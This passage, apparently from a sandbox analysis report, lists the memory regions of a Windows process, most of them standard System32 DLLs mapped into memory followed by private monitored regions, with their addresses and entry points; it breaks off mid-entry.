"\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1410 start_va = 0x7fef8ef0000 end_va = 0x7fef9001fff monitored = 0 entry_point = 0x7fef8f0f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1411 start_va = 0x7fef9010000 end_va = 0x7fef901efff monitored = 0 entry_point = 0x7fef9017e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1412 start_va = 0x7fef9020000 end_va = 0x7fef9028fff monitored = 0 entry_point = 0x7fef9023668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1413 start_va = 0x7fef9030000 end_va = 0x7fef9038fff monitored = 0 entry_point = 0x7fef9031020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1414 start_va = 0x7fef9040000 end_va = 0x7fef9095fff monitored = 0 entry_point = 0x7fef9041040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1415 start_va = 0x7fef90a0000 end_va = 0x7fef90fdfff monitored = 0 entry_point = 0x7fef90a9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1416 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1417 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1418 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1419 start_va = 0x7fef91c0000 end_va = 0x7fef91c9fff monitored = 0 entry_point = 0x7fef91c3994 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 1420 start_va = 0x7fef9670000 end_va = 0x7fef9686fff monitored = 0 entry_point = 0x7fef9679d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1421 start_va = 0x7fef98b0000 end_va = 0x7fef98f1fff monitored = 0 entry_point = 0x7fef98e0048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1422 start_va = 0x7fef9900000 end_va = 0x7fef9919fff monitored = 0 entry_point = 0x7fef9911ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1423 start_va = 0x7fef9940000 end_va = 0x7fef994efff monitored = 0 entry_point = 0x7fef9946894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1424 start_va = 0x7fefb210000 end_va = 0x7fefb223fff monitored = 0 entry_point = 0x7fefb213e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1425 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1426 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1427 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1428 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1429 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1430 start_va = 0x7fefb310000 end_va = 0x7fefb31ffff monitored = 0 entry_point = 0x7fefb31835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1431 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1432 start_va = 0x7fefb340000 end_va = 0x7fefb376fff monitored = 0 entry_point = 0x7fefb348424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1433 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1434 start_va = 0x7fefb3e0000 end_va = 0x7fefb4a1fff monitored = 0 entry_point = 0x7fefb3e101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1435 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1436 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1437 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1438 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1439 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1440 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1441 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1442 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1443 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1444 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1445 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1446 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1447 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1448 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1449 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1450 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1451 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1452 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1453 start_va = 0x7fefcb30000 end_va = 0x7fefcb4efff monitored = 0 entry_point = 0x7fefcb35c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1454 start_va = 0x7fefcc00000 end_va = 0x7fefcc38fff monitored = 0 entry_point = 0x7fefcc0c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1455 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1456 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1457 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1458 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1459 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1460 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1461 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1462 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1463 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1464 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1465 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1466 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1467 start_va = 0x7fefd2c0000 end_va = 0x7fefd2d3fff monitored = 0 entry_point = 0x7fefd2c4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1468 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1469 start_va = 0x7fefd530000 end_va = 0x7fefd539fff monitored = 0 entry_point = 0x7fefd533b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1470 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1471 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1472 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1473 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1474 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1475 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1476 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1477 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1478 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1479 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1480 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1481 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1482 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1483 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1484 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1485 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1486 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1487 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1488 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1489 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1490 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1491 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1492 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1493 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1494 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1495 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1496 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1497 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1498 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1499 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1500 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1501 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1502 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1503 start_va = 0x7fffff58000 end_va = 0x7fffff59fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff58000" filename = "" Region: id = 1504 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 1505 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 1506 start_va = 0x7fffff60000 end_va = 0x7fffff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 1507 start_va = 0x7fffff62000 end_va = 0x7fffff63fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 1508 start_va = 0x7fffff64000 end_va = 0x7fffff65fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff64000" filename = "" Region: id = 1509 start_va = 0x7fffff66000 end_va = 0x7fffff67fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 1510 start_va = 0x7fffff68000 end_va = 0x7fffff69fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 1511 start_va = 0x7fffff6c000 end_va = 0x7fffff6dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6c000" filename = "" Region: id = 1512 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 1513 start_va = 0x7fffff72000 end_va = 0x7fffff73fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 1514 start_va = 0x7fffff74000 end_va = 0x7fffff75fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 1515 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1516 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1517 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 1518 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1519 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1520 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1521 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1522 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1523 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1524 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1525 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1526 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1527 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1528 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1529 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1530 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1531 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1532 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1533 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1534 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1535 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = 